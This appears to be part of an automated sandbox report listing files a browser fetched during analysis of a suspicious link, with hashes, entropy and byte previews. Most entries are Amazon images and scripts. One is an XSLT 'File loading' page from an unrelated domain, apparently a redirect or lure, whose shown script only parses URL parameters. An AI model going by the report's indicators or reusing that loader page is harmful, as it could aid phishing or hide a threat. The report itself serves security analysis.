                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Q6cSo1UY2wrtkDSwu1ynx87zg+UD+K+xnM0:Zclbtk0ynx8vg+HK+xM0
                                                                                                                                                                                                        MD5:E3910FC8D7E97407D94F59B16143D0EF
                                                                                                                                                                                                        SHA1:FC84B8D0003A252DBD6AE6C5EC006D28254C8B67
                                                                                                                                                                                                        SHA-256:B712366A2CF89BDA7DE772FEF6C113F715CB654815A3DC849149C1A5F8CB037D
                                                                                                                                                                                                        SHA-512:ECA27FD7CD1111F51EAE8C2359AC96095E85774FBBC87463C9C36816A9DA3A933B90CA3020D92F358E045D6A0B840679FFE012BDBF3654D317312A23412FDD50
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/617Bf2FnoqL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1..Aq"26Qas.....3Rr....#B....$Cb..4DSc..%5d.....................................................1...!qAQa.234B....."#5br..$.CDR............?..tQE.E.QB.E.P.QM...iz..}t...1.P..6n.WE..l..3...v...1F...U.ES......P.'..).......s..(..[..N3d.....5...>P....;...=8m..+....nQ&.....Z.R.=...P.;..Pq.B.G.v.U..k..f...{.i.L..#G...b.e.W.......-..o.N.V.=e...#.}.-\...P7C...<.7.I..o...vn..7...?s..E.4.}...aED.M.......Z....`. ....%Gn.Q....9...r.r..k.=..l........~.....PG..C?.........'..VTTML.W..6Z....U...WHZ...mc{tg.q.U...).2...MX...).......i.Lg+..:8`.....Z...(..X...(B(....(..,1...K..bB.z.T....J.Sk^.>.T..d._W..[..kQE.T...(B*C..+.m..^.n....bO......X=.lE..].M~7....BW|.{.yv......$..X....B*....).hx.}..n.u.)]KN..5'@.....o.gS.s3vA.D....9.|.o....q.>.....S.kRQL...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5203
                                                                                                                                                                                                        Entropy (8bit):7.836188463655531
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:xyp717Sw2bfkfioZ8v6pYC/gvnDKRWsGilV36SaQej62arQiGibKp5Lo:xyff2CeC/gvnDKRrnZMarQsbK7M
                                                                                                                                                                                                        MD5:E17A9C392B377C4FD7B7F1DEEB758782
                                                                                                                                                                                                        SHA1:DF4DD289DDA661B7124F97416101DC916EE16356
                                                                                                                                                                                                        SHA-256:9FAC05FCF7ED3F20826F4514200E2B15082560D018D596C80A49A7CD19A4EC7F
                                                                                                                                                                                                        SHA-512:6EEF9C7F661A9EAE1583CC95F7231722E215A2EE35A981972E0E53E29D226C5221EE1FE2DCFD82EFFC4BF92F6516C3CB200A46007E23908B4AF7D0DD136D7BF5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332325_186x116_1X_en_AE._SY116_CB597933578_.jpg
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................t...."..........9.........................................................................n.......==@.....<19....+i......7....nl..#~^...n;....kp..z........tt|.e*p....Y..v.........;.G_..y.|...D.......9q.%.H..Mo.-.o......e...,..06.P..o...m...^D.......c.4..E...>...b|y..y...9.UOm.x.FJ.....[.\m9\mV....b...*....>..f..._I..+.E...aZ..{.9=N.....if......l.a+=>.!..._.....".\..a.&../J.z:.<...................Z.............................1..!%5AU..$&04EQaq..F....6Wef...."'DGPRTv.....27@dtu...............?....u.\.e........q......e..I...../.K@.1..6m...X.S...$.. .)........\..m.?.g..rOj.T...wmFUY....'..OiS...Wr.t-....wrT._....]....i.W..w.6K.@Q..L.:c[h.)s..Z..Z9....4..lQp_bL...,@.wUC.H8......r.. .M%..?..,._.:(.d..3...Fq......K ....C.54&..!.....=@....T../L/".I3K.k..!C.k*.M.....{_.....]..Hr.g[..... 5.eh.]..f.....y
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1474646
                                                                                                                                                                                                        Entropy (8bit):5.964126504478192
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:pDSWZhjZ3LSqo6aJ8p2A3rzjZZQAK+d66CUdSjsfbWXT4qFxqqxzcIxAvxp/Viji:hBZhjpSl6aJpmdxt9D
                                                                                                                                                                                                        MD5:9AF52EA3FDDD0BD9AAC73FADED226511
                                                                                                                                                                                                        SHA1:E62BEF9E52ECDDD181042EB6B010972954F8170D
                                                                                                                                                                                                        SHA-256:8ABD6D4BFA3E53B8360C53556DFA3380DD0F6BE51BB5503CCB49542DE3E0739B
                                                                                                                                                                                                        SHA-512:7E7D3EEE938905DCF94082FF23EF97EC40CF9C7E187D2D6A83F133B07B10596F422F9F327F1FDFC5075D6EE68EC8BBB7A901B144CCB2A9454E6E548915A27D6B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:////////////////////////////////////////////.;(function (packageFunction) {. /* istanbul ignore next */. var p = window.AmazonUIPageJS || window.P;. /* istanbul ignore next */. var attribute = p._namespace || p.attributeErrors;. /* istanbul ignore next */. var namespacedP = attribute ? attribute("ACICAssets", "") : p;.. /* istanbul ignore next */. if (namespacedP.guardFatal) {. namespacedP.guardFatal(packageFunction)(namespacedP, window);. } else {. namespacedP.execute(function () {. packageFunction(namespacedP, window);. });. }.}(function(P, window, undefined){.// BEGIN ASSET ACICAssets - 1.0./////////////////////////.// BEGIN FILE js/acic.js./////////////////////////./*...Full source (including license, if applicable) included below..*/./******/ (function(modules) { // webpackBootstrap./******/ .// The module cache./******/ .var installedModules = {};./******/./******/ .// The require function./******/ .function __webpack_require__(moduleId) {./******/./******
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1824
                                                                                                                                                                                                        Entropy (8bit):4.056051865483735
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dWSIrkb6V3KwiQiVNs3JWAUQG0lURsWmmMS3n:cWcb+m9F/sWmJS
                                                                                                                                                                                                        MD5:31481E9D8E0A56782BF0C61A2EF71499
                                                                                                                                                                                                        SHA1:A635981E9E5EB51742B7CA7D02D07F8ACCD64D34
                                                                                                                                                                                                        SHA-256:7A379A5075496C187B105CB996E700AB2F2F80BA8478D5A61F8AA67120DAA2D2
                                                                                                                                                                                                        SHA-512:838502DF367A50779F4DF7F3D2BCF1B05281AF00B86CE8BDE1BD38B25F005E3A850D89F51D35A074ADAB731BE470A844EEC4C6DD3086F0F66677D055E95EEC67
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://foxloc.com.br/0/index.xslt
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">.. <xsl:template match="/">.. <html lang="en">.. <head>.. <meta charset="UTF-8"/>.. <meta name="viewport" content="width=device-width, initial-scale=1.0"/>.. <title>File loading</title>.. <script>.. <![CDATA[.. // Function to get the value of a parameter from the URL.. function getParameterByName(name, url) {.. if (!url) url = window.location.href;.. name = name.replace(/[\[\]]/g, "\\$&");.. var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)"),.. results = regex.exec(url);.. if (!results) return null;.. if (!results[2]) return '';..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):18684
                                                                                                                                                                                                        Entropy (8bit):7.93763591250368
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:5NYCXlDXmecaVP3cPEEzuRznWTFjct381EidX8SSyKIBxa/ZJ2n+n:DXxXmecaVPcjuRznWZj6IndQYxCZcM
                                                                                                                                                                                                        MD5:B20499771C5AFEF374F38BDAAFBFF8E7
                                                                                                                                                                                                        SHA1:FCB7F93E5706F900BB35BAF933C3104FCDBA4F18
                                                                                                                                                                                                        SHA-256:AF303EC24F5EB5325A966B1E0D7C9100E40A5F2671CBBD85B8501C8E97165105
                                                                                                                                                                                                        SHA-512:7A9F4255D327194CD890503FD1F5901008EBAE5F8A7B1043CA2C258E1373B61C43DF8E48B27413E26A6F947F8EFC25C4520761C2099ED58EC6D038B33FA8F88C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/41gRz4miKkL._SR480,440_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................X..........$.'^.....zB.X..hO.....!..h.E....=.y..{d._\...N......q......................C...k.0=-.\M.#.%.....bH...?.I^..,...zE.._....G'7+r..y..4.<..<..1C.K..H=/..4=U..........................<.....P.E.AS...R....wz..N..'D.._.Y:W.K5.>.S.W%...@.9..XrjI#.).*.|Q.\.D...IY,b....u&1.k.zw..=.............x...(a.....WG...2.i.?8.....'....u.l.sP....M.,.j7s...q.Q5F......I....3............w.............y..~..l..*Gc...../...%h...)9@e..E.'w..,..rc.ji..4MT.\..,.M...F....U0.}..}fX...w.............ys.......lp.......=G.B.I.#$...E......v...g&.o...jj....}NQ..@..9n7A...d;..n.-................u...<./.eNU.L. ...)..Et.(8@c.....o..,'M..3.=w..J.3..y$Jw...n.q$Vn&.7..5VDG}7/................*........|..}(`|.........T.B%5....r.b.x....ze...m.i.A%...:..'8.M.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (586)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):23071
                                                                                                                                                                                                        Entropy (8bit):5.361962438493604
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:/y2yQbKsU21yv1Dkd/boShcX4l35wG0oVEnHc5gCACPjNiFQ/2CW+LjdzO7hdV8s:/y2yQbKsU21Wkd/0ShcX4/wposHc5gDh
                                                                                                                                                                                                        MD5:1BDE5B3DD51828A3402C2B8ABE060D36
                                                                                                                                                                                                        SHA1:FEB7A3F43C163FA54E64778B1A2C0ABCEF5CBE61
                                                                                                                                                                                                        SHA-256:7646470956F34BA35FFAF15E1FC05D8E277EB4A5595C101C3140404FF708A307
                                                                                                                                                                                                        SHA-512:7E404B53CB49305525B1EF63A7CFF19A3FCE64997D2937F9EDEA777B8017616F493EDA444D1072CF4B03147AA6411EB491B957515263057B0C413C4583390E54
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/419+2yoLMAL.js?AUIClients/CVFAssets
                                                                                                                                                                                                        Preview:P.register("cvfVersion",function(){return{version:"0.1.0.0-2024-08-11"}});"use strict";.P.when("A","cvfFormDataGenerator","cvf-client-side-counters-util","ready").register("cvf-account-switcher",function(b,k,a){function n(a,d){a.preventDefault();var c=k.retrieveFormData(a.target),h=c.inputData.serializeArray();h.push(e(a.target));b.ajax(window.location.protocol+"//"+window.location.host+c.requestPath,{method:"POST",params:h,success:d,error:f})}function e(a){a=h(a);var b=a.attr("name");b||(b=a.closest(".cvf-account-switcher-sign-out-link").attr("data-name"));var d=a.attr("value");d||.(d=a.closest(".cvf-account-switcher-sign-out-link").attr("data-value"));return{name:b,value:d}}function f(a,d,c){b.trigger(p.error,c)}function c(a){var b=/([^@\s]+)@([a-zA-Z0-9_-]+)(\.[a-zA-Z0-9._-]+)/ig.exec(a);if(null!==b){a=b[1];a=h.trim(a);var d=a.length;if(1!==d){for(var c=a.charAt(0),e=0;e<d-2;e++)c+="*";a=c+=a.charAt(d-1)}a+="@";c=b[2];c=h.trim(c);d=c.length;c=c.charAt(0);for(e=0;e<d-1;e++)c+="*";ret
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):29858
                                                                                                                                                                                                        Entropy (8bit):5.409792287231912
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:vcd3+dIq67FP9E3vFYwFToRr4TXBwgvBpqu4v5IPg4Ye+/jfrY6bV6akWvBir0/v:vcJOFGP9EfbTopAPALrqaBFbuAKVIBd
                                                                                                                                                                                                        MD5:B562654AA29EB0DE5BAC8DB1F07D3A58
                                                                                                                                                                                                        SHA1:936D232080513599DDF289BBF19DEBEA48465EA1
                                                                                                                                                                                                        SHA-256:D0CE96A306F6A3E5F3EF7D89B0758ABE65BDD09B1F2C78ABA937A0063C8B1F8F
                                                                                                                                                                                                        SHA-512:3ABE1FC2642CFAD3AEE94BA65367AF676B00772F472F10F460588CA2A6C5395FD7B50CFAA6FF95D0A6B0CEEF120DAC915F2DB592D45D583E10317D46BACF0D6D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:{"html":"\u003cdiv class\u003d\"rhf-border\"\u003e\u003cdiv id\u003d\"rhf-shoveler\"\u003e\u003c/div\u003e\u003cdiv class\u003d\"celwidget pd_rd_w-agx10 content-id-amzn1.sym.cb2e421d-130c-4154-89f5-508ab5cbe603 pf_rd_p-cb2e421d-130c-4154-89f5-508ab5cbe603 pf_rd_r-QK7DTWVET017GVYGS6SY pd_rd_wg-2SBZZ pd_rd_r-f7003639-2a3b-48f6-962f-569a422f8b06 c-f\" cel_widget_id\u003d\"p13n-rvi_desktop-rvi_0\" data-csa-op-log-render\u003d\"\" data-csa-c-content-id\u003d\"amzn1.sym.cb2e421d-130c-4154-89f5-508ab5cbe603\" data-csa-c-slot-id\u003d\"desktop-rvi-1\" data-csa-c-type\u003d\"widget\" data-csa-c-painter\u003d\"p13n-rvi-cards\"\u003e\u003cscript\u003eif(window.mix_csa){window.mix_csa(\u0027[cel_widget_id\u003d\"p13n-rvi_desktop-rvi_0\"]\u0027, \u0027#CardInstance2K8l1yN4hSMSXufXS8HPAw\u0027)(\u0027mark\u0027, \u0027bb\u0027)}\u003c/script\u003e\n\u003cscript\u003eif(window.uet){window.uet(\u0027bb\u0027,\u0027p13n-rvi_desktop-rvi_0\u0027,{wb: 1})}\u003c/script\u003e\n\u003cstyle\u003e.p13n-sc-rvi
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):3.2226627197680635
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUzRtwv+L1pse:1/se
                                                                                                                                                                                                        MD5:F837AA60B6FE83458F790DB60D529FC9
                                                                                                                                                                                                        SHA1:14AF87CCEC7F81BB28D53C84DA2FD5A9D5925CDA
                                                                                                                                                                                                        SHA-256:DCECAB1355B5C2B9ECEF281322BF265AC5840B4688748586E9632B473A5FE56B
                                                                                                                                                                                                        SHA-512:A85E09C3B5DBB560F4E03BA880047DBC8B4999A64C1F54FBFBCA17EE0BCBED3BC6708D699190B56668E464A59358D6B534C3963A1329BA01DB21075EF5BEDACE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):34542
                                                                                                                                                                                                        Entropy (8bit):7.977546728683746
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:628Fy2O8TTm+ofQqHSQjY/x986iJJpSBTaO4trs0COB:6Fy2jTTm+ofQmxgbsJJkr4trs0COB
                                                                                                                                                                                                        MD5:AE3CB3878CB4812AB5714825B0412F4A
                                                                                                                                                                                                        SHA1:3FB4ED064B10DA206B84224AC5A80FF53522435F
                                                                                                                                                                                                        SHA-256:75A6A197DBB8688F0ECB9224630C13E890E13A401D3EDE1D74053E173D114678
                                                                                                                                                                                                        SHA-512:40386598CE4E17A77D3903337D759A3CF883BF2EBB19F037EA150C8C135B545409F58B6C23677ECAA240D47493E2C4D64148F8EC9FA99F86D02D347C99273865
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/51vSWnZJsfL._SR480,440_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5...................................................................9..9.oS..y.7a..3o%vH..RP....................<=..%J.-. ....9v.].h..(....v.....N_.......yLci=.;...+....U.}.]..l..s.ws._......N.G...o.<..7.}.F.]C.,>^.k..=!.7)..4V._:.M...kyFj.e.....2.e.X.\.E.B.y/...2.....{.......:....^*..P;.../.c.......E.sC...w.#7v..Z../.Y|.......GZ..ucZ.P.......a...9~...?G..v.i..e..........B...:.{v..>..l>..|...2....8..8.-....f..[.Uy...;{`f..=...0.;%zc...z....:.."..&..HYh....z:.6...q.U...N.'.9i......|5K.$...[.~.e..<0.<....7.y......O....i.'....Kg/R.-K{>|G8t.(y.4..<....{....r.[..]}q.<........ek.w+.c.....u...c..Z..]s..6....?.....g.z.z.P.h.8c..ox..~...6..SI{<]......b0.....nv.I....b.......p....fo-..5v...}...c.:....}gV........m..5.....:...~..W:DY..e.J..\8.....^)......<}...t.o.y^.....Z..'..h..}..]r/]
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):56755
                                                                                                                                                                                                        Entropy (8bit):7.973406642815217
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:VtMKW43ZIHxIlLasEzXjw4jGeDZbToj4Aig1Ct5Er:NWqORyLdEzz9Qj4Aig0bEr
                                                                                                                                                                                                        MD5:BE236EBEF7B0090BFFCF31A5181B1BAF
                                                                                                                                                                                                        SHA1:0F52B2342A6236339EFAA5A98DCD061884CF9C91
                                                                                                                                                                                                        SHA-256:338A305336D450EEEB81068B22C7A34FF69B43732EB2EDF0EDD6549F12A21416
                                                                                                                                                                                                        SHA-512:FAC9572E8F750BFE0F3985CBF0290E1D5F16505ECEB1F977A1313B9B9D217A8DB7CFA21EB3FC0AABE5D3BF2F76C947B5CD8FA8384AD4A62247467B1A97249970
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................................;...................................................................................[a.....]...p.6.[..}G.z.+......k..i\..cV...............>`..`....{/X.s.4..p....*...[...&....q..p..........:4.....+i.y.q........+l.lJ....cnp.z.*..........~..N...B6B..k........*..2w.[..a..............h.....'"................6...........?.&[.......>...........+R.... 6o.......D=..ho.[....................Jf,m...=.W.:#.5.#..|.....y5...........h..{..........0.............vK.v[.~S.C..,.s_.@5....."...D9.............c..K........0....w.......Z.07.]........'2...............?.~.]\.eXj......f..X.......ML.;M.@..(.ivc#.{..............@...xx......>3...V..|.Z3..Q.F...B.'.~.i.}..0........a./...........;|5....f.^.f.}..u.(..i....G...&"..e....S.+.....;.&=s.n_o0.._L..".~...........x..u.P..-f..=ssV...{.R..!r}...?.P.}..E.l~L.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):12914
                                                                                                                                                                                                        Entropy (8bit):7.899040090858498
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:YRg5hcCLUBXeeIRmaPJpuV17ReLBoz1VWvTxhUvc8QXuWRJ3fjoQDQZuf0Ik:YUhNoBYPPGdRTZWTxlNhvfjoQDQyk
                                                                                                                                                                                                        MD5:682A2C97EDA77C422EDD117FC4AEC43B
                                                                                                                                                                                                        SHA1:0A1448C6FB56C68FDE2BAAACC9795499EE4D2FBA
                                                                                                                                                                                                        SHA-256:DEE025E33DFC4BB9DFD84B450EF88BFA2DD25496768AD765CFEA00DC9FDF210B
                                                                                                                                                                                                        SHA-512:1BD3DE86DDBD95F8772991EF23542B6BDBAD159EED439DBE52DB92F4C76508C8AA2BB59B9CC1E89D8966A5BCD6849DC91DE8436AE8BF97003AD87601A5C08778
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259751_400x400_2X._CB617696541_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................................................................................................................."..........3.............................................................................x.;.3.nT.=...<.!..............[]..j|.\..).<......=...k...W.,.............9w.:........u...v}._a..J.........:......$............vo.~.o; ......c....&..=....K)..zP......d..lyR..YW......l'.&M~.w7.YH......B0u......~any..[......#o..]?C.....i.[...Qvso.b.N.O=..L*...M..;B...,%.....2.>.S.....;...dN..d..l...N.|..'`.vF.q.:#....X*.1. ....:...>..ru...p.0g...#.P......<.w7</.g.c..=..}.[....].b.r.t}.^.r[...\..V.........*...mQ...i...........v..n..i........V-v....Y.Ti...I^y...o...........o~k...<(.{.;..H........F_..F_.O..2|..}.c}......O[.O.]7........{.vw..y.. B.a.........8}....FO.vP.....>....l...7./..#..._9...............v..x..........`..:.z.3.-.e..\.......h..(k..vZ.5...}.n....Q.#.....ZZS.m.i.......... ..VtY.>...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D3007%26pc%3D5787%26at%3D5787%26t%3D1723729113767%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:5786
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 204x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5572
                                                                                                                                                                                                        Entropy (8bit):7.914613394862699
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TsWxxJMQ/1uf4uQEIfy8IbDSAHWeRUjhGbUQ/bd1MBJZoBQCwICwbC8oopsL/dvc:4WxxZuwuQEi+buCUsbx/bD2prgpsTd0
                                                                                                                                                                                                        MD5:5D0D40620A3BA1203F80EB487A7AEEC7
                                                                                                                                                                                                        SHA1:C1E9FCAC746EF05228D209FD21BE8B22DCB33FFC
                                                                                                                                                                                                        SHA-256:6BEC2E1299B6E50A956EDBE60EAE74C96250240BD00384A3E8CA0FF8992A4121
                                                                                                                                                                                                        SHA-512:DD4E7A78E0727B14C973BB14A93837FEAC91C2A40DCD3F5649F06973F1CF86A444E8842DF26F3788077501BB51BC20AF567B3E20D2D08E9621AE9780B86CC03E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................1.!A."2BQRaq.4r......s..#3b......5t.$c.............................................!1A............?..Z" ""..`IGU....z...y..W.!6.Yp.G...]919.{.5.y...+.,..f.Z^:...o.......Hy..>..3....|..f.=..].5A.....[.......=f|.....$y./.`.;...p-.o......w.....Pl.....[.s6y#....<...NVkck.......:M......v.#...~..H*....=..lr.:.[.hPU...............^....,..y..V.+.......H...DQ0.~...#n.{.4/+m7.lZ.C..j.x^.....co........a.....v..{.W.u..kU;u.c.>Z.5.m...]..z.[..9.j;..Y..y......^'~.....U.lO..7k.i.4...RJn_ara~.R.V..X.T..V........q]j.)..w...x.8..7o.].rYa...*|...81u._...1>2.n.G.ybf..:.l_...7gr.....%6/.......,..68..{..\jH......n.....x#.'.=ED.[..{o/..HRw..jZ........S..-O..F..." ""." ""." ...y..s..\.5....6kCE.'@..o....>./.4.....%..Fy..g.D.1Q.H;o&....z.9.M.....>2Z
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
